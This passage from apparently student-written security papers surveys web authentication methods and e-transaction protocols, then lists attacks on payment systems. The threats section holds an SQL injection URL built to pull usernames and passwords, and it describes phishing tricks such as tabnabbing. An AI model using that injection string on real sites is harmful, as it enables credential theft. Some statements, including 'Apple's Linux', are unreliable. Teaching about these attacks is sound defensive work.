in a reversibly encrypted from, thus the server can access and run them through checksum algorithms [26]. This authentication method is not as secure as client certificate authentication or mutual authentication but it is better than basic access authentication. 228 Kerberos. Kerberos was created by Massachusetts Institute of Technology as a solution to network security problems. Kerberos is a network authentication protocol, designed to provide strong authentication for client/server applications using secretkey cryptography. It provides tools of authentication and strong cryptography over the network to help a client prove its identity to a server (and vice versa) across an insecure network connection [3]. After which, communication between the client and server will be encrypted to assure privacy and data integrity. Implementation of Kerberos. Kerberos works by encrypting data with a symmetric key where the details are sent to a key distribution center (KDC) instead of directly between each computer. The KDC maintains a database of secret keys where each entity on the network (either client or server) shares a secret key known only to itself and to the KDC [19]. The KDC consists of two logically separate parts: an Authentication Server (AS) to prove an entity's identity using knowledge of the secret key and a Ticket Granting Server (TGS) to generate a session key for encrypting transmissions during communication. When the client logs in with its password, the AS verifies the client's identity and grants it a Ticket Granting Ticket (TGT) [20]. The TGT contains identification credentials such as a randomly-created session key and a timestamp of eight hours. When the client wants to contact some service server (SS), the client then contacts the TGS, using the ticket to prove its identity and asks for a service. The client can (re)use this ticket as long as it is not expired. If the client is eligible for the service, the TGS sends another ticket to the client. The client then contacts the SS and uses the latter ticket to authenticate itself and prove that it has approval to receive the service. Advantages and Disadvantages of Kerberos Advantages: Kerberos protocol messages are protected against eavesdropping and replay attacks [1]. Users’ passwords are never sent across the network, neither in encrypted or in plain text, preventing password sniffing [12]. In addition, secret keys are only sent across the network in encrypted form. Hence, contents of snooped and logged conversations on an insecure network do not contain enough information for an attacker to impersonate an authenticated user or an authenticated target service. Kerberos also input timestamps and lifetime information in the tickets passed between clients and servers to secure communications within the network [12]. By using use short enough ticket lifetimes that is no longer than the estimated time for a hacker to crack the encryption of the ticket helps prevent brute-force and replay attacks. Furthermore, due to time-outs, users had to periodically request for new authentication and thus hackers would constantly encounter new cryptographic ciphers to decode and hence insufficient time to break the cipher. Kerberos supports mutual authentication which helps to prevent man-in-the-middle attacks as the client and server systems mutually authenticate each other and are certain that they are communicating with genuine partner who claims to be who he is [21]. 229 Apart from being an authenticating protocol itself, Kerberos could also be integrated to secure a second factor authentication, such as a one-time password (OTP). Furthermore, Kerberos provide a layer of security where by firewall could not depended on. Disadvantages: In general, Kerberos system requires continuous availability of a central server thus, if the Kerberos server is down, no one will be able to log in [3]. Kerberos is also not useful for persistence connection due to the limiting lifetime of tickets and session keys used for encryption. As tickets are time-stamped, Kerberos has strict time requirements and require the clocks of the involved hosts to be synchronized within the configured limits. The authentication will fail if the clock times are more than five minutes apart. The Kerberos authentication model is also vulnerable to brute-force attacks against the KDC [12]. Since the entire authentication system of Kerberos is dependable on the KDC, any compromise of the KDC will allow an attacker to impersonate any user. As Kerberos was designed for use with single-user client systems but not all client systems are single-user systems [12]. In the case of multi-user system, the Kerberos authentication scheme can still be susceptible to a variety of ticket-stealing and replay attacks. 3 Suggestions to Web Developers Web developers intending to secure their applications would have to consider the different kinds of password authentication methods to employ to suit their web applications. Some factors to consider that may affect the choice of authentication would be cost and efficiency issues. Twitter and Basic Authentication. Before 10th August 2010, Twitter made use of basic authentication for logging into the Twitter server. The switch to another form of authentication, Open Authorization (OAuth) was made due to the lack of security that basic authentication provides. With basic authentication, the client provides his/her username and password to third parties over the network in plaintext whenever a new page is requested. This makes it very easy for packet sniffers to intercept passwords. Also, the server stores passwords, making it a liability in the case when passwords are leaked. In addition to that, the performance of basic authentication is rather inefficient. Every page requested by the client would require a lookup for the user in the database. This would result in a less efficient server, especially when a large number of people are using the server. 230 Therefore, although basic authentication is the simplest form of authentication that one can make use of, it is not particularly secure and is easy to hack if and when any malicious attempt is made. Unless the web application is not particularly in need of any security, in the case of a simple personal project, then basic authentication might be used. However, in the instance of a more secure environment, such as banking services, basic authentication should not be used. Facebook and HTTPS. Facebook, one of the most popular social media sites used by millions around the world would require a reasonable level of security. The numerous photos posted on Facebook with people tagged require a higher level of security for the sake of personal privacy. The developers of Facebook realize the need for such security and have obtained SSL certificates which allow users to browse over HTTPS. Some issues regarding HTTPS are cost and latency. The cost for licensing the certificate is approximately over $1,000 for a single year alone. It is due to the high costs that some web developers shun away from these licenses, to keep costs at a minimum. However, in the case of Facebook, this cost is essential and should not be avoided to secure the privacy of the millions of users. Latency is due to the fact that there are more steps to carry out for verification (‘handshakes’) as opposed to basic authentication. These extra handshakes are necessary in HTTPS authentication before data is sent to the client. Nevertheless, the slight latency is a small price to pay for security. In fact, with the advancement of technology, latency would be improved as networks develop. Financial Industry and Mutual Authentication. In the financial industry, both users and banking systems need assurance that each party is authentic. This is important to make sure that bank customers would not leak their credential information to phishing websites, while the system would only allow bank customers to access. Mutual authentication is considered to be a secure method for this authentication process. However, there are not many financial organizations implement it. It is because of the high implementation cost. The cost of getting a public key certificate issued by a trusted organization, a certificate authority (CA) such as VeriSign is expensive. Hence, it is hard for general users to obtain a public key for the servers to identify. Bank customers can verify the public key of an Internet banking website such as DBS Bank Ltd (internet-banking.dbs.com.sg) since the identity of DBS Bank Ltd has been verified by VeriSign. Users can be assured that they are communicating with the legitimate DBS website. On the other side, DBS web server is unable to check the legitimacy of individual clients based on their digital certificates. The web server will attempt to match the signature on the client certificate to a known CA using the web server's certificate store. If the client’s certificate is not registered under any CA, the web server which is using mutual authentication can simply refuse to accept connections from that client who is not authenticated. Hence, the banking systems 231 have to use other security methods such as two-way factor authentication which involves a token and a password to make the authentication process more robust. Digest Authentication. Nowadays, there are more e-commerce websites which are using SSL to protect the users’ login credentials. The websites often buy a costly SSL server digital certificate from CA and only use it for authentication. It is because the SSL encryption routine will seriously tax a web server when overload. For example, Microsoft Hotmail only uses SSL to encrypt its users’ login page then switches to unencrypted HTTP after that. Even though SSL is used, many web applications still store users’ password in plain text in database. An attacker can easily retrieve all the credential information if the web server is compromised. Hence, digest authentication is a fairly secure and cheaper authentication method to be considered by web application developers. Using digest authentication, users’ login credentials are never transmitted across the network, nor are they stored in database in plain text. Web developers with less financial resources do not need to purchase expensive digital certificates every year. Furthermore, the authentication is performed by web server itself, the web application just have to ensure that authentication is in placed. Digest authentication protocol uses hashes instead of plain text. Web developer may develop their own hash authentication mechanism but it is much reliable to use existing digest mechanism. However, digest authentication is suitable only to protect username and passwords. SSL is still the best method if the content transmitting needs to be protected or the users need assurance that they are connecting to the legitimate server. Web application developers have to take note that digest authentication is a single factor authentication and thus subject to weaknesses of traditional authentication methods. Kerberos. Kerberos comes as a viable and powerful solution to network security problems. It is an open standard managed by the Internet Engineering Task Force (IETF) [19]. Many operating systems such as IBM’s AIX, Apple’s Linux and Microsoft’s Windows are using it for authentication for most of their login modules [22]. In addition, many remote login applications available on UNIX-like Open SSH, telnet, rlogin have Kerberized versions. Kerberos is used by both mainstream vendors and other open source [32]. Numerous improvements had been made to Kerberos as the working model matures over the years. Kerberos is now able to support multiple cryptographic algorithms, scalable systems and others more. Given that Kerberos is mature, in place in many operating systems and application and being architecturally sound [22], it is a very feasible authentication system to use. While Kerberos is very much stable and secure now, there may be a deterrence factor for users not to use it. Kerberos are much more complicated than the other authentication methods discussed and thus, to simplify things, web developers may shun away from this method. Cost may be another factor but Kerberos system is available free on open source platforms. However, one thing to note is that the 232 Kerberos system provided by open source and commercial may differ so developers need to weigh the factors well when choosing the Kerberos system to use. 4 Conclusion In conclusion, we have started off discussing the vulnerability of web applications, the possible authentication attacks, authentication methods that could help to counter some of the attacks and ended with evaluation of the authentication methods and giving some suggestions for web developers to consider when choosing authentication methods. The future technology will change and new hacking methods may occur and subsequently, authentication methods will need to change correspondingly to counter those attacks. There is no one perfect solution to security problems. Web developers will have to continuously review their authentication techniques to protect the privacy of their systems and users. 233 Table 1. Overview of comparison among different authentication techniques. Basic Authentication Form-based Authentication HTTPS/SSL Mutual Authentication Digest Authentication Kerberos Low Low High High Medium High Methods Passwords sent as plaintext. Passwords sent as plaintext. Logout after inactivity of certain period Client authenticates server through public key certificates Exchange of certificates between client and server. Simple challenge response paradigm with digest session key. Passwords are never sent across the network. Only secret keys in encrypted form are sent. Vulnerability Man in the middle attacks. Man in the middle attacks Possibility of server’s public key being altered, leading to client believing (altered) key is legitimate. Most web applications do not required client side certs. Man in the middle Brute-force attacks attacks against the KDC Password stored in a Susceptible to reversibly encrypted ticket-stealing and form. replay attacks No mechanism to identify server’s legitimacy. Security level 234 References 1. Aldinger, T. (n.d.). What Are the Advantages of Kerberos?| eHow.com. Retrieved October 15, 2011, from eHow: http://www.ehow.com/list_5981928_advantageskerberos_.html 2. Arumugam, P. (2002, December 12). J2EE Form-based Authentication. Retrieved October 13, 2011, from O'Reilly on Java: http://onjava.com/pub/a/onjava/2002/06/12/form.html 3. Bezroukov, N. (2010, May 06). Kerberos. Retrieved October 14, 2011, from Softpanorama: http://www.softpanorama.org/Authentication/kerberos.shtml 4. Conjecture Corporation. (2011). What is a Brute Force Attack. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-a-brute-force-attack.htm 5. Conjecture Corporation. (2011). What is a Dictionary Attack. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-a-dictionary-attack.htm 6. Conjecture Corporation. (2011). What is a Phising Scam. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-a-phishing-scam.htm 7. Conjecture Corporation. (2011). What is Network Sniffing. Retrieved October 9, 2011, from WiseGeek: http://www.wisegeek.com/what-is-network-sniffing.htm 8. Conjecture Corporation. (2011). What is Session Hijacking. Retrieved October 8, 2011, from WiseGeek: clear answers for common questions: http://www.wisegeek.com/what-is-session-hijacking.htm 9. Conjecture Corporation. (2011). What is Spyware. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-spyware.htm 10. Conjecture Corporation. (2011). What is Pharming. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-pharming.htm 11. Doshi, P., & Siddharth, S. (2010, November 2). Five common Web application vulnerabilities. Retrieved October 9, 2011, from Symanec Connect: http://www.symantec.com/connect/articles/five-common-web-applicationvulnerabilities 12. Duke University. (n.d.). Kerberos: Advantages and Weaknesses. Retrieved October 15, 2011, from Duke University: http://www.duke.edu/~rob/kerberos/kerbasnds.html 13. Dun & Bradstreet. (n.d.). Trust in Secure Identity. Retrieved October 3, 2011, from Dun & Bradstreet: http://www.dnb.com/US/communities/ecommerce/trust_secure.asp 14. Federal Financial Institutions Examination Council. (2001). Authentication in an Internet Banking Environment. Retrieved October 15, 2011, from Federal Financial Institutions Examination Council: http://www.ffiec.gov/pdf/authentication_guidance.pdf 235 15. Financial Services Technology Consortium. (2005). FSTC Blueprint for Mutual Authentication: Phase 1. Retrieved October 15, 2011, from Financial Services Technology Consortium: http://www.fstc.org/projects/docs/FSTC_Better_Mutication_v11.pdf 16. GlobalSCAPE, Inc. . (n.d.). GlobalSCAPE Knowledge Base. Retrieved October 7, 2011, from GlobalSCAPE: http://kb.globalscape.com/KnowledgebaseArticle10691.aspx 17. IBM. (2010, September 20). Secure Sockets Layer client certificate authentication. Retrieved September 24, 2011, from IBM: WebSphere Application Server: http://publib.boulder.ibm.com/infocenter/wasinfo/v6r0/index.jsp?topic=%2Fcom.ibm .websphere.express.doc%2Finfo%2Fexp%2Fae%2Frsec_csiv2cca.html 18. IIS Admin Blog. (2007, October 8). How to Secure a Web Site Using Client Certificate Authentication. Retrieved September 24, 2011, from IIS Admin Blog: http://www.iisadmin.co.uk/?p=11 19. Kerberos (protocol) - Wikipedia, the free encyclopedia. (n.d.). Retrieved October 14, 2011, from Wikipedia: http://en.wikipedia.org/wiki/Kerberos_(protocol) 20. Learn Networking. (2008, January 28). How Kerberos Authentication Works : LearnNetworking.com. Retrieved October 15, 2011, from Learn Networking: http://learnnetworking.com/network-security/how-kerberos-authentication-works 21. McGowan, L. (2011, June 02). What Are the Advantages of Kerberos Authentication?| eHow.com. Retrieved October 15, 2011, from eHow: http://www.ehow.com/info_8527576_advantages-kerberos-authentication.html 22. MIT Kerberos Consortium. (2008). kerberos.org. Retrieved October 25, 2011, from Kerberos: http://www.kerberos.org/software/whykerberos.pdf 23. Network Working Group. (1997). An Extention to HTTP: Digest Acess Authentication. Retrieved October 10, 2011, from Network Working Group: http://tools.ietf.org/html/rfc2069 24. Network Working Group. (1999). HTTP Authentication: Basic and Digest Authentication. Retrieved October 15, 2011, from Network Working Group: http://tools.ietf.org/html/rfc2617 25. Oiwa, Y. (2008). HTTP Mutual Authentication Protocol Proposal. Research Centre for Information Security. 26. Open Web Application Secutiry Project Foundation. (2010). Authentication in IIS. Retrieved October 16, 2011, from Open Web Application Secutiry Project Foundation: https://www.owasp.org/index.php/Authentication_In_IIS 27. Red Hat. (n.d.). Red Hat. Retrieved October 3, 2011, from Red Hat Certificate System: http://docs.redhat.com/docs/enUS/Red_Hat_Certificate_System/8.0/html/Deployment_Guide/Introduction_to_Publi c_Key_Cryptography-Certificates_and_Authentication.html 236 28. SSL Shopper. (2011). Why SSL? The Purpose of using SSL Certificates. Retrieved October 13, 2011, from SSL Shopper: http://www.sslshopper.com/why-ssl-thepurpose-of-using-ssl-certificates.html 29. Sun Microsystems. (2005, December 6). Installing and Configuring SSL Support . Retrieved September 24, 2011, from The J2EE(TM) 1.4 Tutorial: http://java.sun.com/j2ee/1.4/docs/tutorial/doc/Security6.html#wp80737 30. Tech Target. (2007). Digest Authentication. Retrieved October 15, 2011, from Tech Target: http://searchsecurity.techtarget.com/definition/digest-authentication 31. Tech Target. (2007). Mutual Authentication. Retrieved October 15, 2011, from Tech Target: http://searchfinancialsecurity.techtarget.com/definition/mutual-authentication 32. University of Portsmouth. (2007, November 27). Kerberos- Commercial or Open Source? Retrieved October 25, 2011, from University of Portsmouth: http://mosaic.cnfolio.com/M591CW2007B103 33. Wang, X., & Yu, H. (n.d.). How to Break MD5 and Other Hash Functions. Retrieved October 15, 2011, from http://merlot.usc.edu/csac-f06/papers/Wang05a.pdf 34. Zaikin, M. (2005, March). Chapter 5. Web Application Security. Retrieved October 11, 2011, from SCWCD 1.4 Study Guide: http://java.boot.by/wcdguide/ch05s03.html 237 238 Data Security for E-transactions: Online Banking and Credit Card Payment System Jun Lam Ho, Alvin Teh, Kaldybayev Ayan Abstract. In this paper, we will explore the environment and protocols used for online banking and credit card payment system including Secure Electronic Transaction (SET), 3D Secure, Hypertext Transfer Protocol Secure (HTTPS) etc. Subsequently, we will study the threats commonly faced by these systems. Finally, we will be analyzing the current systems while offering alternative ways that may help to resolve the problem, which is the insecurity of the current E-transactions systems. 1 Introduction Today, in a generation of IT technologies, electronic transactions have made buying and selling products easy and comfortable. An electronic transaction is the sale or purchase of goods or services whether between business, individuals, governments and other public or private organizations conducted over electronic systems such as the Internet or other computer mediated network. The payment for goods can be done using credit-card payment (offline) or online banking payment (online). Both of these methods of paying is widely spread around the world and plays important role in making payment convenient for both parties. Online banking (or Internet banking) allows customers to conduct financial transactions on a secure website operated by their retail or virtual bank, credit union or building society. The ancestor of the modern online banking services was the distance banking services over electronic media from the early 1980s. And it became popular with a use of terminal (with keyboard and monitor) to access the banking system using a phone line. It also had another feature such as sending tones down a phone line with instructions to the bank. That time some online banking services were never popular due to the commercial failure. However, today, in a world of new technologies, many banks are Internet only banks. Unlike their predecessors, banks today differentiate themselves by offering better interest rates and online banking features. Another popular type of payment today is the payment using payment cards. The payment card covers a range of different cards that can be presented by a cardholder to make a payment. It is basically attached to an account which has funds 239 in it. Payment cards can be classified into categories such as: credit card, debit card, charge card, stored-value card and fleet card. Out of these types of cards the most popular ones are credit card and debit card. Credit card as well as debit card provide and alternative payment method to cash when making purchases. Costumers can also choose between the variety of E-check and E-cash systems. Electronic money or E-cash refers to money that is only exchanged electronically. Electronic money systems fall under 3 categories like centralized, decentralized and offline anonymous systems.. E-cash systems such as PayPal, WebMoney, cashU functions as a centralized system. They sell their electronic currency directly to the end user. They have become popular too, since they allow using online money transfers as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Although, new technologies make purchasing and selling goods convenient, and make online shopping possible, there is another problem which concerns users of these systems: “Is it safe?”. Security is the most crucial part when it comes to Etransactions. Without proper security it may lead to be under attacks of hackers, frauds. It will cause a lot of damage such as mainly loss of funds and exposing private information of customers. Security is critical to the success of electronic commerce over the Internet; without privacy, consumer protection cannot be guaranteed, and without authentication, neither the merchant nor the consumer can be sure that valid transactions are being made. That is why all popular E-transaction systems are mostly pay attention to security of their systems and their costumers. 1.1 Expanded CIA factors for e-transaction E-transaction systems handle a huge number of transactions involving large sum of money and sensitive customer information. These systems operate under a set of security protocols and environment which differs from other information systems. The main difference comes from the information these systems are handling which is defined by a set of characteristics. We will take a look at the characteristic of information which closely relates to e-transaction systems to gain a better understanding of the protocols and environment used to run these systems. Confidentiality refers to the non-disclosure of information to unauthorized personnel. This is achieved by means of authentication provided by the e-transaction system which grants authorized user access rights to the account they hold Integrity refers to the information being free from corruption and exist as a complete form. Hashing is one of the method used to verify the integrity of information. Availability refers to the ability of authorized user to gain access to information when needed without obstructions. Authenticity refers to the quality of the information being genuine or original. This is achieved together with non-repudiation by means of digital signatures and public key encryption. 240 Accuracy refers to the information being free from error. 2 Protocols and Systems 2.1 Online shopping and payment SET Protocol Payment card systems use mostly uses Secure Electronic Transactions (SET). The Secure Electronic Transaction (SET) is an open encryption and security specification that is designed for protecting credit card transactions on the Internet. It was developed by payment card companies such as Visa and MasterCard, and was supported my IBM, Microsoft, Netscape and other companies. It is a standard for protecting the privacy and ensuring the security of electronic transactions. With SET, a customer is given an electronic wallet (digital certificate) and a transaction is controlled using a digital certificates and digital signatures among 3 member party: purchaser, a seller, and the purchaser’s bank. SET uses variety of security systems such as: Netscape’s Secure Sockets Layer, also known as SSL, Terisa System’s Secure Hypertext Transfer Protocol (S-HTTP or HTTPS) and Microsoft’s Secure Transaction Technology (STT). So what kind of encryption mechanisms does the SET use? The SET protocol uses different encryption mechanisms, as well as authentication mechanism. The SET uses both symmetric and asymmetric (public key) encryptions. It uses symmetric encryption Data Encryption Standard (DES) and asymmetric encryption to transmit session keys for DES transactions. Moreover, SET uses session keys of 56 bits, which are transmitted asymmetrically. The rest of the transaction uses symmetric encryption in the form of DES. In SET, message data is encrypted using a randomly generated symmetric key (a DES 56-bit key). This key, after, is encrypted using the message recipient’s public key (RSA). The result is the so called “digital envelope” of the message. It combines the encryption speed of DES with the key management advantages of RSA public-key encryption. After encryption, the envelope and the encrypted message itself are sent to the recipient. After receiving the encrypted data, the recipient decrypts the digital envelope first using his or her private key to obtain the randomly generated symmetric key and then uses the symmetric key to unlock the original message. However, this level of using 56-bit key encryption is weak, and can be easily cracked using powerful hardware. In the past DES cracking machines were designed too obtain message data. Thus, this is the main problem and concern of SET since DES encrypts the majority of a SET transaction. Another protocol that SET uses is called use of asymmetric key - digital signature (Message Digests). As we mentioned above, in SET, the public key cryptography is only used to encrypt DES keys and for authentication (digital signature) but not for the main body of the transaction. In SET, the RSA modulus is 1024 bits in length. SET uses a distinct public/private key to generate the digital signature. Each SET members possesses two asymmetric key pairs, which is used in the process of key encryption and decryption, and a “signature” pair for the creation and verification of digital signatures (160-bit message digests). This algorithm makes sure that no two different messages can have the same message digest. 241 Now let’s examine another protocol that SET uses. Let’s consider following picture. It is the way of SET protocol making use of Dual Signature. Figure 1: SET protocol using Dual Signature [1] 1. In the picture above Payment Information (PI), which contains all the information about cardholder’s card, is hashed to produce Payment Information Message Digest (PIMD) 2. At the same time cardholder performs hashing the Order Information (OI) to get Order Information Message Digest (OIMD) 3. After, both of the Information Messages Digests are being combined to get Payment and Order Message Digest (POMD) 4. Card holder, then encrypts the POMD with its own private key and gets Dual Signature (DS). 5. After obtaining Dual Signature cardholder sends: a. OI, PIMD, and DS to the merchant; b. PI, OIMD, and DS to the payment gateway; [1] This method ensures that merchant, who has received Order Information, Payment Information Message Digest and Dual Signature, will not be able to find payment information. Thus merchant cannot know the cardholder’s credit card number. But, since merchant received Order Information, merchant will start processing the order. At the same time, payment gateway which has received payment information will deduct amount of money from the cardholder’s account and sends it to the merchant. SET has advantages and lacks of the following requirements: Confidentiality - payment info is secure but order info is not secure Data Integrity - Uses mathematical techniques to minimize corruption or detect malicious tamper Client Authentication - Digital ID (certificate) is used to identify costumer and Digital ID (certificate) is checked via the card’s Issuer 242 Merchant Authentication - Digital certificate again used as a back check for confirming the merchant is valid SET can work in Real Time or be a store and forward transfer, and is industry backed by the major credit card companies and banks. Its transaction can be accomplished over the WEB or via email. It provides confidentiality, integrity, authentication, and non-repudiation. SET is a very comprehensive and very complicated security protocol. It is the main protocol of ensuring privacy and security during the credit card payment. 3-D Secure There exist another, rather new, security protocol called “3-D Secure”. It was developed by Visa (product name is called Verified by Visa), the leading company in handling electronic transactions. 3-D Secure is based on XML format and is used as an additional security layer for credit and debit card transactions. Not long enough, this protocol was adopted by MasterCard and American Express, and was named as MasterCard SecureCode and SafeKey respectively. 3-D Secure combines online authentication process using SSL to protect credit card information during transmission. 3-D Secure is based on 3 domain model: 1. Acquirer Domain 2. Issuer Domain 3. Interoperability Domain [2] This protocol uses XML messages which were sent over SSL connection with client authentication. It makes sure that both sides (server and client) are authorised. 3-D Secure initiates a redirection to the client card’s bank to authorize the transaction. In this way, bank takes the responsibilities to ensure the secure transaction. Both parties as merchant and card holder benefit from it in their own way: 1. Merchants get the reduction of "unauthorized transaction" chargebacks. 2. Card Holders benefit from decreased risk of other people being able to use their payment cards fraudulently on the Internet. 3-D Secure card issuing bank or its Access Control Server (ACS) asks a buyer for a password that only buyer and bank know. It ensures that merchant will not be able to know the password. This method decreases the risk in two ways: 1. Card details will not be useful without additional password for purchasing. Additional password is not stored or written on the card. 2. Hackers cannot use credit/debit card information obtained from merchants, since no additional password information will be given to merchants. There is no way hackers can get that password. This is the way how 3-D Secure works: 243 When an electronic transaction occurs on a 3D secure website and the cardholder is paying using a credit/debit card enrolled in 3D secure either the MasterCard or VISA pop up or inline frame security screens appear. The user is then asked to enter their password (which can be a combination of letters or numbers) which is known only to them. MasterCard or VISA then returns the user to the electronic commerce store after authentication. 2.2 Online banking Today, many banks are Internet only banks. Single password authentication as in most secure Internet shopping sites, is considered to be insecure for personal online banking applications in most countries. In order to make online banking as secure as possible, there exist two different security methods for online banking: • Personal Identification Number (PIN): Single password used to logging in and one time password (TAN): password given to authenticate transactions • Signature based online banking where all transactions are signed and encrypted digitally. The Keys for the signature generation and encryption can be stored on smartcards or ThumbDrive or any memory medium, depending on the concrete implementation. PIN is easy to understand criteria for a security, we will examine one time password (TAN). TAN is the second layer of security above and beyond the traditional singlepassword authentication. TANs provide additional security due to acting as a twofactor: if hacker manages to get PIN number, he or she will not be able to perform any operations without knowing a valid TAN. Mostly TANs are distributed using different ways: 1. Sending online bank user’s TAN by postal code 2. Sending online bank user’s TAN via SMS to user’s (GSM) mobile phone Second type of obtaining TAN is considered the most secure one since user gets SMS with quote in it representing TAN or the transaction amount and details. In this case TAN is valid for some short period of time. The most secure way of using TANs is to generate them by need using a security token. These token generated TANs depend on the time and a unique secret, stored in the security token (two-factor authentication or 2FA). Another security measures that all online banking websites use is secure 244 socket layer (SSL) secured connections. The SSL protocol allows client/server applications to communicate across a network in a way designed to prevent eavesdropping and tampering. The SSL encrypt the segments of network connections above the Transport Layer, using asymmetric cryptography for privacy and a keyed message authentication code for message reliability. Most of the online banking system websites use Hypertext Transfer Protocol Secure (HTTPS) for port 443. HTTPS is the combination of Hypertext Transfer Protocol (HTTP) and SSL/TLS. If we examine packets sent and received in both HTTPS and HTTP protocols we can see that messages in HTTPS are encrypted and cannot serve with any use for hackers who obtained them. From the picture above we can see that everything in the HTTPS message is encrypted, including the headers, and the request/response load. From the information provided in above picture, the attacker can only know the fact that a connection is taking place between the two parties, already known to him, the domain name and IP addresses. 3 Threats Faced by E-Transaction Systems SQL Injection SQL injection is a common vulnerability as a result of lax input validation. It is an attack on the site itself, in particular its database. The attacker takes advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. As a result, attackers can retrieve, modify or even delete data from the database [3]. This will eventually allow sensitive data of the particular company to be exposed to the attacker, including customers’ credit card numbers, account passwords etc. Recently, there is a mass SQL injection attack which depends on the sloppy misconfigurations of website servers and back-end databases have hit more than 1 million ASP. NET Web pages. Hence, it is extremely important for the organizations to pay attention to this particular problem to prevent it from happening. Some of the common prevention ways include looking for SQL signatures in the incoming HTTP stream, observing the SQL communication and builds a profile consisting of all allowed SQL queries and also monitoring a user’s activity over time and to correlate various anomalies generated by the same user. Eg. http://www.mydomain.com/products/products.asp?productid=123 UNION SELECT user-name, password FROM USERS Price Manipulation This particular vulnerability is unique to online shopping carts and payment gateways. The cause of this vulnerability is that the total payable price is always stored in a dynamically generated web page as shown in Figure 1 and as such, an attacker can easily modify the amount using web application proxy. Shown below is a picture of how the final payable price can be manipulated by the attacker before sending the information to the payment gateway. Vulnerabilities of a similar kind has also been found when these information are stored in a client-side cookies which can easily be accessed and modified. 245 Figure 2: Demonstratio of Price Manipulation [4]. Buffer Overflow The overall goal of a buffer overflow attack is to subvert the function of a privileged program so that the attacker can take control of that program, and if the program is sufficiently privileged, the attacker will be able to control the host. A buffer overflow occurs when a program or process tries to store more data in a buffer than it was intended to hold. As a result, the extra information may overflow into adjacent buffers, corrupting or overwriting the valid data held in them. This, in turn, has become a vulnerability that attackers are able to exploit. Attackers imbed codes designed to trigger specific actions which send new instructions to the attacked computer in the extra data allocated to the specific buffer which could allow the attacker to damage user’s files, change data or even disclose confidential information. It is commonly associated with programming languages such as C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not check that data written to an array is within the boundaries of that array. Therefore, manual bounds checking by the user are often required to prevent a buffer overflows attack. A buffer overflow attack can be either a stack-based exploitation which is an exploitation on the call stack, or a heap-based exploitation which is a buffer overflow occurring in the heap data area. Besides manual bound checking as mentioned above, other countermeasure include writing secure data, stacking execute invalidation, relying on the help of a compiler which has built-in safeguards that try to prevent the use of illegal addresses and dynamic run-time checks that relies on the safety code being preloaded before an application is execute. 246 Remote Command Execution The vulnerability occurs when an attacker is allowed to execute operating system commands due to inadequate input validation. It is commonly found with the use of system call in Perl and PHP scripts. Problems arise when scripts writer assume that the user will input data to their CGI program in correct format and as a result, when a user supply some special meta-characters such as “;”, “|” etc. in the user input data, these characters may make the scripts to do other things other than the scripts originally intended. Successful exploitation of the vulnerability may result in the ability to execute arbitrary commands with elevated privilege of the web server. Weak Authentication and Authorization An attacker can use tools to attack authentication system which do not prohibit multiple failed log in or website that uses HTTP Basic Authentication or session IDs that are not being passed over Secure Socket Layer. Brute force method can be applied to the attacks if the algorithm involved is simple as one can write a Perl script to enumerate through the possible session ID space and break the application's authentication and authorization schemes Phishing It’s pronounced the same way as fishing, is similar to the popular sport whereby the fisherman cast a hook with fish food of hoping that some unsuspecting fish would bite the bait. In the case of phishing, the hacker poses as a trusted source; the hacker tries to lure unsuspecting victims to enter illegitimate websites where oblivious user would enter their personal information into the illegitimate websites. General Internet user have the misconception that phishing scams could only be conducted by means of fraudulent email that redirects user to illegitimate website, thus giving them a false sense of security that they are safe as long as they avoid clicking any links in email. However, that is not the case as there are many ways other ways in which phishing scam is conducted and it is important to know these technique to be able to safeguard our personal information. We will explore a couple of phishing scams that are commonly used. Filter Evasion Conventional phishing scams are done using a combination of texts and images. However, the prevalence of spam filter subjects phishing mail to greater scrutiny as the spam filter is able to detect any text-based phishing contents and thus these mail are filtered out from the mailbox. As a result, hackers are turning into the uses of images to replace text that contains the phishing information, thereby bypassing the filter mechanism. Website forgery This is the most commonly known form of phishing in which the hacker would create a fake website that looks identical to a legitimate website; in terms of website design with only slight variation in the URL. Identification of a forged website is easy; user could compare the URL of trusted website to the suspected website or using web browser that supports anti-phishing measure that alerts user to known phishing sites. Unfortunately, while security features evolved to meet changing security needs, phishing techniques have also evolved to counter security measures in place. Website forgery has evolved; hackers have come up with ingenious to exploit on the user 247 common perception that a website is safe from forgery as long as the URL of the site matches those of a legitimate site. This is achieved by means of a Javascipt that runs when users click on a link which redirects them to a phishing website; the Javascript suppresses the address bar and replaces it with a fake address bar, which displays the address of the trusted website rather than the address of the phishing site [5]. Tabnabbing This is a term coined by Aza Raskin, creative lead of Firefox, on his blog where he demonstrated a proof-of-concept on this new phishing technique. According to Raskin, this technique works on the tabbed features provided by most browsers. It begins when a user enters a normal looking website (where the phishing scripts are going to run) and then for whatever reason, he decides to navigate away from the current tab to open up a few other tabs. During this time, the scripts running on the phishing site detect inactivity on the page and then begin running codes that replace the site contents; favicon, title and appearance to something a user would be familiar with. Take for example, a bogus Gmail website requesting for login information, which looks very similar to the legitimate website. When the user browses through the open tabs he chances upon the familiar Gmail favicon, and as described by Raskin that "memory is malleable and moldable", the user assume that he has indeed open the Gmail tab and unsuspectingly enters his login information into the phishing site. This attack could be extended to other form of web services, most notably social networking sites, bank websites and ecommerce websites. Furthermore, Raskin stated that the attack could be customized to detect web services accessed by the victim and then generate web pages dynamically to fit the user [6]. Pop-up on legitimate website This attack targets the vulnerability of javascript pop-up found in web browser where dialog boxes bearing no information of their origin could to be opened. The scam begins with the user clicking on a link from a malicious website or email. The link then directs the user to a legitimate website thereafter a pop-up requesting for login information would appear as an overlay on the legitimate website. A similar variation of this attack known as session phishing, involved the use of a malware that injects malicious code into browser. The attack begins with the user logging into a legitimate banking site, then the malware detects the web service accessed and then display a pop-up prompt claiming that the session has expired and request for user input to renew the session. Both of these attacks have a higher rate of success as the attack happens on the legitimate website and thus user who receive these unauthorized prompt have the tendency to to perceive that the request is legitimate. Evil twin Evil twins are wireless network created by phishers with the intention to confuse user by offering access points that have the same name as legitimate access points; thereby creating a confusion in hope of luring unsuspecting users to access the rouge network. This attack is common in places where wireless hotspots could be found. The phisher begins by scanning an area for an access points to target, then impersonate the access point. Unsuspecting user accessing the 